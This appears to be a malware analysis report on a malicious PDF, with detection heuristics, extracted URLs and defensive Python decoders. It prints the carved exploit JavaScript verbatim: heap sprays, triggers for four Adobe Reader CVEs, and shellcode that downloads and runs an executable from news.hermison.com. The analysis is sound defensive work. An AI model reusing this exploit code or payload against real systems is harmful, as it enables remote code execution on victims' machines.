Malicious PDF — malware analysis report

Static analysis result for SHA-256 001b674722b383ed…

Verdict: MALICIOUS
File type: PDF
Size: 2.9 KB
MD5: 29e9977f307a4df549b8c10c7a56fb0e
SHA-1: f36145b0823f710fcb848608d6e49b24653ea111
SHA-256: 001b674722b383edcb7c73f62a8d9c1fe0618f3dc821f71478acd65cb5a42559
Risk score: 610

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1204.002 Malicious File
  • T1059.007 JavaScript

The PDF's /JS stream carries JavaScript hidden behind a split('!#$').join("") wrapper. Once that delimiter is stripped, the script is a version-gated dispatcher that fires whichever known Adobe Reader vulnerability matches the viewer: CVE-2009-4324 (media.newPlayer), CVE-2009-0927 (Collab.getIcon), CVE-2007-5659 (Collab.collectEmailInfo) or CVE-2008-2992 (util.printf), each preceded by a heap spray of near-identical shellcode. That shellcode is a urlmon-style download-and-execute stub whose hardcoded URL is 'http://news.hermison.com/exe.php?spl=PDF%20(printd'; the spl parameter differs per branch (printd, EmailInfo, util_printf, GetIcon), so the server learns which Reader bug fired. This is an exploit-kit delivery mechanism for a second-stage executable.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 (severity: critical; CVE match: exact; rule: CVE_2009_4324)
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 (severity: critical; CVE match: exact; rule: CVE_2009_0927)
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 (severity: critical; CVE match: exact; rule: CVE_2008_2992)
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher (severity: critical; CVE match: likely; rule: PDF_PIDIEF_MULTI_CVE_DISPATCH)
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit (severity: critical; rule: PDF_ADOBE_READER_MULTI_CVE_JS_KIT)
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action (severity: low; 3 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL (severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (all referenced by PDF JavaScript; the spl tag differs per exploit branch):
    • http://news.hermison.com/exe.php?spl=PDF%20(printd
    • http://news.hermison.com/exe.php?spl=PDF%20(EmailInfo
    • http://news.hermison.com/exe.php?spl=PDF%20(util_printf
    • http://news.hermison.com/exe.php?spl=PDF%20(GetIcon
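The PDF_JS_SHELLCODE_DOWNLOAD_URL finding says the second-stage URL is stored inside the sprayed shellcode as little-endian %uXXXX escapes. The Python below is an added worked example, not output of the analysis engine: it strips the sample's split('!#$').join("") wrapper (shown on a short constructed fragment in the same scheme), lays the %u-escaped payload out as UTF-16LE the way Reader's heap holds it, and pulls printable strings from the result. Run on the printd() shellcode copied verbatim from the carved script further down this page, it recovers the loaded DLL (urlmon.dll), the drop path (C:\U.exe) and the complete download URL, including the closing parenthesis that the per-URL listing above truncates.

```python
"""Recover download-and-execute indicators from the sprayed Reader shellcode.

Added example for this report, not part of the analysis engine. The shellcode
constant is copied verbatim from the printd() branch of the carved artifact;
the layer-1 fragment is a short constructed sample in the same split/join
scheme as the sample's /JS stream.
"""
import re
import string

HEX4 = re.compile(r"[0-9A-Fa-f]{4}")
HEX2 = re.compile(r"[0-9A-Fa-f]{2}")
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")  # 0x20..0x7E

# Layer 1: every character of the real script is separated by a delimiter that
# split('!#$').join("") removes at run time, so keyword scanners never see
# "unescape" or "Collab" as contiguous text. (constructed fragment)
LAYER1_DELIMITER = "!#$"
LAYER1_FRAGMENT = 'u!#$n!#$e!#$s!#$c!#$a!#$p!#$e!#$(!#$"!#$%!#$u!#$5!#$4!#$E!#$B!#$"!#$)'

# Layer 2: the payload sprayed by printd(), verbatim from the carved script
PRINTD_SHELLCODE = (
    "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320"
    "%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2"
    "%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B"
    "%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B"
    "%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A"
    "%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B"
    "%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40"
    "%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83"
    "%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8"
    "%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52"
    "%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF"
    "%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40"
    "%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A"
    "%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E"
    "%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D"
    "%u4644%u3225%u2830%u7270%u6E69%u6474%u0029"
)


def strip_split_join(text, delimiter=LAYER1_DELIMITER):
    """Undo x.split(delimiter).join(""): the delimiter is simply deleted."""
    return text.replace(delimiter, "")


def unescape_to_heap_bytes(s):
    """Emulate JavaScript unescape() and lay the result out as UTF-16LE, which
    is how the string sits on Reader's heap after the spray. A %uXXXX escape is
    one 16-bit code unit, so %u54EB becomes the bytes EB 54 (a jmp short)."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith("%u", i) and HEX4.fullmatch(s[i + 2:i + 6]):
            out += int(s[i + 2:i + 6], 16).to_bytes(2, "little")
            i += 6
        elif s[i] == "%" and HEX2.fullmatch(s[i + 1:i + 3]):
            out += int(s[i + 1:i + 3], 16).to_bytes(2, "little")
            i += 3
        else:
            out += s[i].encode("utf-16-le")
            i += 1
    return bytes(out)


def printable_strings(data, min_len=4):
    """Runs of printable ASCII at least min_len bytes long (like strings(1))."""
    found, run = [], bytearray()
    for b in data + b"\x00":  # sentinel flushes a run that ends the buffer
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def extract_indicators(shellcode_js):
    """Pick the download-and-execute artefacts out of the decoded shellcode."""
    data = unescape_to_heap_bytes(shellcode_js)
    strs = printable_strings(data)
    return {
        "entry_is_short_jmp": data[:1] == b"\xeb",  # EB xx: jump over inline data
        "loaded_dlls": [s for s in strs if s.lower().endswith(".dll")],
        "drop_paths": [s for s in strs if re.match(r"^[A-Za-z]:\\", s)],
        "urls": [s for s in strs if s.startswith(("http://", "https://"))],
        "all_strings": strs,
    }


if __name__ == "__main__":
    print(strip_split_join(LAYER1_FRAGMENT))
    for key, value in extract_indicators(PRINTD_SHELLCODE).items():
        print(f"{key}: {value}")
```

The same decoder applied to the emailinfo() and util_printf() payloads from the carved script yields the same DLL and drop path with only the spl tag in the URL changing, which is what makes the three branches one downloader rather than three.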

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
SHA-256: dd2c377afb7489b09ff76578317b1c84ad50ced5d661d2b21b7ccb28a6f940b8
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0xDB
Size: 28010 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function FhnbODwP(UIJcVLxxYq) { return UIJcVLxxYq.split('!#$').join(""); } eval(FhnbODwP('f!#$u!#$n!#$c!#$t!#$i!#$o!#$n!#$ !#$p!#$r!#$i!#$n!#$t!#$d!#$(!#$)!#${!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$v!#$a!#$r!#$ !#$c!#$h!#$u!#$n!#$k!#$_!#$s!#$i!#$z!#$e!#$,!#$ !#$p!#$a!#$y!#$l!#$o!#$a!#$d!#$,!#$ !#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$;!#$\n!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$c!#$h!#$u!#$n!#$k!#$_!#$s!#$i!#$z!#$e!#$ !#$=!#$ !#$0!#$x!#$8!#$0!#$0!#$0!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$p!#$a!#$y!#$l!#$o!#$a!#$d!#$ !#$=!#$ !#$u!#$n!#$e!#$s!#$c!#$a!#$p!#$e!#$(!#$"!#$%!#$u!#$5!#$4!#$E!#$B!#$%!#$u!#$7!#$5!#$8!#$B!#$%!#$u!#$8!#$B!#$3!#$C!#$%!#$u!#$3!#$5!#$7!#$4!#$%!#$u!#$0!#$3!#$7!#$8!#$%!#$u!#$5!#$6!#$F!#$5!#$%!#$u!#$7!#$6!#$8!#$B!#$%!#$u!#$0!#$3!#$2!#$0!#$%!#$u!#$3!#$3!#$F!#$5!#$%!#$u!#$4!#$9!#$C!#$9!#$%!#$u!#$A!#$D!#$4!#$1!#$%!#$u!#$D!#$B!#$3!#$3!#$%!#$u!#$0!#$F!#$3!#$6!#$%!#$u!#$1!#$4!#$B!#$E!#$%!#$u!#$3!#$8!#$2!#$8!#$%!#$u!#$7!#$4!#$F!#$2!#$%!#$u!#$C!#$1!#$0!#$8!#$%!#$u!#$0!#$D!#$C!#$B!#$%!#$u!#$D!#$A!#$0!#$3!#$%!#$u!#$E!#$B!#$4!#$0!#$%!#$u!#$3!#$B!#$E!#$F!#$%!#$u!#$7!#$5!#$D!#$F!#$%!#$u!#$5!#$E!#$E!#$7!#$%!#$u!#$5!#$E!#$8!#$B!#$%!#$u!#$0!#$3!#$2!#$4!#$%!#$u!#$6!#$6!#$D!#$D!#$%!#$u!#$0!#$C!#$8!#$B!#$%!#$u!#$8!#$B!#$4!#$B!#$%!#$u!#$1!#$C!#$5!#$E!#$%!#$u!#$D!#$D!#$0!#$3!#$%!#$u!#$0!#$4!#$8!#$B!#$%!#$u!#$0!#$3!#$8!#$B!#$%!#$u!#$C!#$3!#$C!#$5!#$%!#$u!#$7!#$2!#$7!#$5!#$%!#$u!#$6!#$D!#$6!#$C!#$%!#$u!#$6!#$E!#$6!#$F!#$%!#$u!#$6!#$4!#$2!#$E!#$%!#$u!#$6!#$C!#$6!#$C!#$%!#$u!#$4!#$3!#$0!#$0!#$%!#$u!#$5!#$C!#$3!#$A!#$%!#$u!#$2!#$E!#$5!#$5!#$%!#$u!#$7!#$8!#$6!#$5!#$%!#$u!#$0!#$0!#$6!#$5!#$%!#$u!#$C!#$0!#$3!#$3!#$%!#$u!#$0!#$3!#$6!#$4!#$%!#$u!#$3!#$0!#$4!#$0!#$%!#$u!#$0!#$C!#$7!#$8!#$%!#$u!#$4!#$0!#$8!#$B!#$%!#$u!#$8!#$B!#$0!#$C!#$%!#$u!#$1!#$C!#$7!#$0!#$%!#$u!#$8!#$B!#$A!#$D!#$%!#$u!#$0!#$8!#$4!#$0!#$%!#$u!#$0!#$9!#$E!#$B!#$%!#$u!#$4!#$0!#$8!#$B!#$%!#$u!#$8!#$D!#$3!#$4!#$%!#$u!#$7!#$C!#$4!#$0!#$%!#$u!#$4!#$0!#$8!#$B!#$%!#$u!#$9!#$5!#$3!#$C!#$%!#$u!#$8!#$E!#$B!#$F!#$%!#$u!#$0!#$E!
#$4!#$E!#$%!#$u!#$E!#$8!#$E!#$C!#$%!#$u!#$F!#$F!#$8!#$4!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$E!#$C!#$8!#$3!#$%!#$u!#$8!#$3!#$0!#$4!#$%!#$u!#$2!#$4!#$2!#$C!#$%!#$u!#$F!#$F!#$3!#$C!#$%!#$u!#$9!#$5!#$D!#$0!#$%!#$u!#$B!#$F!#$5!#$0!#$%!#$u!#$1!#$A!#$3!#$6!#$%!#$u!#$7!#$0!#$2!#$F!#$%!#$u!#$6!#$F!#$E!#$8!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$8!#$B!#$F!#$F!#$%!#$u!#$2!#$4!#$5!#$4!#$%!#$u!#$8!#$D!#$F!#$C!#$%!#$u!#$B!#$A!#$5!#$2!#$%!#$u!#$D!#$B!#$3!#$3!#$%!#$u!#$5!#$3!#$5!#$3!#$%!#$u!#$E!#$B!#$5!#$2!#$%!#$u!#$5!#$3!#$2!#$4!#$%!#$u!#$D!#$0!#$F!#$F!#$%!#$u!#$B!#$F!#$5!#$D!#$%!#$u!#$F!#$E!#$9!#$8!#$%!#$u!#$0!#$E!#$8!#$A!#$%!#$u!#$5!#$3!#$E!#$8!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$8!#$3!#$F!#$F!#$%!#$u!#$0!#$4!#$E!#$C!#$%!#$u!#$2!#$C!#$8!#$3!#$%!#$u!#$6!#$2!#$2!#$4!#$%!#$u!#$D!#$0!#$F!#$F!#$%!#$u!#$7!#$E!#$B!#$F!#$%!#$u!#$E!#$2!#$D!#$8!#$%!#$u!#$E!#$8!#$7!#$3!#$%!#$u!#$F!#$F!#$4!#$0!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$F!#$F!#$5!#$2!#$%!#$u!#$E!#$8!#$D!#$0!#$%!#$u!#$F!#$F!#$D!#$7!#$%!#$u!#$F!#$F!#$F!#$F!#$%!#$u!#$7!#$4!#$6!#$8!#$%!#$u!#$7!#$0!#$7!#$4!#$%!#$u!#$2!#$F!#$3!#$A!#$%!#$u!#$6!#$E!#$2!#$F!#$%!#$u!#$7!#$7!#$6!#$5!#$%!#$u!#$2!#$E!#$7!#$3!#$%!#$u!#$6!#$5!#$6!#$8!#$%!#$u!#$6!#$D!#$7!#$2!#$%!#$u!#$7!#$3!#$6!#$9!#$%!#$u!#$6!#$E!#$6!#$F!#$%!#$u!#$6!#$3!#$2!#$E!#$%!#$u!#$6!#$D!#$6!#$F!#$%!#$u!#$6!#$5!#$2!#$F!#$%!#$u!#$6!#$5!#$7!#$8!#$%!#$u!#$7!#$0!#$2!#$E!#$%!#$u!#$7!#$0!#$6!#$8!#$%!#$u!#$7!#$3!#$3!#$F!#$%!#$u!#$6!#$C!#$7!#$0!#$%!#$u!#$5!#$0!#$3!#$D!#$%!#$u!#$4!#$6!#$4!#$4!#$%!#$u!#$3!#$2!#$2!#$5!#$%!#$u!#$2!#$8!#$3!#$0!#$%!#$u!#$7!#$2!#$7!#$0!#$%!#$u!#$6!#$E!#$6!#$9!#$%!#$u!#$6!#$4!#$7!#$4!#$%!#$u!#$0!#$0!#$2!#$9!#$"!#$)!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$ !#$=!#$ !#$u!#$n!#$e!#$s!#$c!#$a!#$p!#$e!#$(!#$"!#$%!#$u!#$0!#$d!#$0!#$d!#$%!#$u!#$0!#$d!#$0!#$d!#$"!#$)!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$w!#$h!#$i!#$l!#$e!#$ !#$(!#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$.!#$l!#$e!#$n!#$g!#$t!#$h!#$ !#$<!#$ 
!#$c!#$h!#$u!#$n!#$k!#$_!#$s!#$i!#$z!#$e!#$)!#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$ !#$+!#$=!#$ !#$n!#$o!#$p!#$s!#$l!#$e!#$d!#$;!#$\n!#$ !#$ !#$ !#$ !#$ !#$ !#$ !#$ !#
... (truncated)
Filename: legacy_pdfkit_stage_000.js
SHA-256: 540b0fa3cb579288a05725e4bf54079a05d5fecbcfcdcc972a826af9ce9dc861
Kind: deobfuscated-js
Source: split-join delimiter stripped JavaScript at offset 0x10C
Size: 7508 bytes
Detection
ClamAV: Pdf.Exploit.Agent-35646
Obfuscation or payload: likely
Carved artifact contains 13 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function FhnbODwP(UIJcVLxxYq) { return UIJcVLxxYq.split('').join(""); } eval(FhnbODwP('function printd(){\n        var chunk_size, payload, nopsled;\n\n        chunk_size = 0x8000;\n        payload = unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D%u4644%u3225%u2830%u7270%u6E69%u6474%u0029");\n        nopsled = unescape("%u0d0d%u0d0d");\n        while (nopsled.length < chunk_size)nopsled += nopsled;\n        nopsled_len = chunk_size - (payload.length + 20);        \n        nopsled = nopsled.substring(0, nopsled_len);\n        heap_chunks = new Array();\n        for (var i = 0 ; i < 1200 ; i++)heap_chunks[i] = nopsled + payload;\n\n        util.printd("1.000000000000000000000000 : 0000000", new Date());\n        try {\n                media.newPlayer(null);\n        } catch(e) {}\n        util.printd("1.000000000000000000000000 : 0000000", new Date());\n} \n\nfunction emailinfo() {\n        function fix_it(yarsp,len) {\n                while(yarsp.length*2<len) { yarsp+=yarsp; }\n                yarsp=yarsp.substring(0,len/2);\n                return yarsp; \n        }\n        var 
shellcode=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D%u4644%u3225%u2830%u6D45%u6961%u496C%u666E%u296F%u0000");\n        var mem_array=new Array();\n        var cc=0x0c0c0c0c;\n        var addr=0x400000;\n        var sc_len=shellcode.length*2;\n        var len=addr-(sc_len+0x38);\n        var yarsp=unescape("%u9090%u9090");\n        yarsp=fix_it(yarsp,len);\n        var count2=(cc-0x400000)/addr;\n        for(var count=0;count<count2;count++) {\n                mem_array[count]=yarsp+shellcode; \n        }\n        var overflow=unescape("%u0c0c%u0c0c");\n        while(overflow.length<44952) {overflow+=overflow; }\n        this.collabStore=Collab.collectEmailInfo( { subj:"",msg:overflow } ); \n}\nfunction util_printf() {\n        var payload = 
unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6E2F%u7765%u2E73%u6568%u6D72%u7369%u6E6F%u632E%u6D6F%u652F%u6578%u702E%u7068%u733F%u6C70%u503D%u4644%u3225%u2830%u7475%u6C69%u705F%u6972%u746E%u2966%u0000");\n        var nop ="";\n        for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u90
... (truncated)
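The PDF_PIDIEF_MULTI_CVE_DISPATCH and PDF_ADOBE_READER_MULTI_CVE_JS_KIT findings score a stage like the one previewed above by correlating several Reader sinks, heap-spray staging and a viewer-version gate, rather than by matching API keywords one at a time. The Python below is an added example of that correlation, not the engine's own rule. SAMPLE_STAGE is a constructed condensation of the printd(), emailinfo() and util_printf() branches previewed above: the shellcode is shortened, and the util.printf trigger and the app.viewerVersion gate are constructed, because the preview is truncated before both.

```python
"""Correlate Reader exploit sinks across the branches of a deobfuscated stage.

Added example for this report, not the engine's rule. SAMPLE_STAGE condenses
the previewed printd()/emailinfo()/util_printf() branches; its util.printf
call and app.viewerVersion gate are constructed (the preview is cut before them).
"""
import re

# Acrobat JavaScript sinks and the Reader bugs they reach (per the findings above)
SINKS = {
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "util.printf": "CVE-2008-2992",
    "Collab.getIcon": "CVE-2009-0927",
    "media.newPlayer": "CVE-2009-4324",
}

# Heap-spray staging that turns a bare API keyword into an exploit branch
SPRAY_HINTS = {
    "unicode_escaped_payload": re.compile(r"""unescape\(\s*["'](?:%u[0-9A-Fa-f]{4})+"""),
    "sled_doubling": re.compile(r"(\w+)\s*\+=\s*\1\b"),  # x += x until a size is hit
    "array_fill_loop": re.compile(r"for\s*\([^)]*\)\s*\{?\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+"),
}

SAMPLE_STAGE = r'''
function printd(){
        var chunk_size = 0x8000, payload, nopsled;
        payload = unescape("%u54EB%u758B%u8B3C%u3574");
        nopsled = unescape("%u0d0d%u0d0d");
        while (nopsled.length < chunk_size)nopsled += nopsled;
        nopsled = nopsled.substring(0, chunk_size - (payload.length + 20));
        heap_chunks = new Array();
        for (var i = 0 ; i < 1200 ; i++)heap_chunks[i] = nopsled + payload;
        util.printd("1.000000000000000000000000 : 0000000", new Date());
        try { media.newPlayer(null); } catch(e) {}
}
function emailinfo() {
        function fix_it(yarsp,len) { while(yarsp.length*2<len) { yarsp+=yarsp; } return yarsp.substring(0,len/2); }
        var shellcode=unescape("%u54EB%u758B%u8B3C%u3574");
        var mem_array=new Array();
        var yarsp=fix_it(unescape("%u9090%u9090"),0x400000);
        for(var count=0;count<200;count++) { mem_array[count]=yarsp+shellcode; }
        var overflow=unescape("%u0c0c%u0c0c");
        while(overflow.length<44952) {overflow+=overflow; }
        this.collabStore=Collab.collectEmailInfo( { subj:"",msg:overflow } );
}
function util_printf() {
        var payload = unescape("%u54EB%u758B%u8B3C%u3574"), nop = "";
        for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090");
        var heap = new Array();
        for (var i = 0; i < 1000; i++) heap[i] = nop + payload;
        util.printf("%45000f", 0);  // constructed trigger; preview is cut before the real call
}
// constructed gate: the report states the stage branches on app.viewerVersion
if (app.viewerVersion < 8) emailinfo(); else if (app.viewerVersion < 9) util_printf(); else printd();
'''


def top_level_functions(js):
    """Split the stage into top-level function bodies by brace matching. Nested
    helpers (fix_it inside emailinfo) stay inside their parent; braces inside
    string literals are not special-cased."""
    funcs, pos = {}, 0
    for m in re.finditer(r"\bfunction\s+(\w+)\s*\([^)]*\)\s*\{", js):
        if m.start() < pos:
            continue
        depth, i = 1, m.end()
        while i < len(js) and depth:
            depth += {"{": 1, "}": -1}.get(js[i], 0)
            i += 1
        funcs[m.group(1)] = js[m.end():i - 1]
        pos = i
    return funcs


def triage(js):
    """Per-branch sink/CVE attribution plus the multi-CVE dispatcher verdict."""
    branches = []
    for name, body in top_level_functions(js).items():
        sinks = [s for s in SINKS if s in body]
        if not sinks:
            continue
        branches.append({
            "function": name,
            "cves": [SINKS[s] for s in sinks],
            "spray_hints": [h for h, rx in SPRAY_HINTS.items() if rx.search(body)],
        })
    cves = sorted({c for b in branches for c in b["cves"]})
    gated = "app.viewerVersion" in js
    if len(cves) >= 2 and gated:
        verdict = "multi-cve-dispatcher"  # Pidief-style per-version template
    elif len(cves) >= 2:
        verdict = "multi-cve-kit"
    elif cves:
        verdict = "single-sink"
    else:
        verdict = "no-reader-sink"  # generic form JavaScript stays low-severity
    return {"verdict": verdict, "cves": cves, "version_gated": gated, "branches": branches}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_STAGE), indent=2))
```

Feed it the real legacy_pdfkit_stage_000.js rather than SAMPLE_STAGE to check the engine's claim of a Collab.getIcon branch; a benign form script that only calls util.printd() stays at "no-reader-sink", which is the distinction the low-severity PDF_JAVASCRIPT rule relies on.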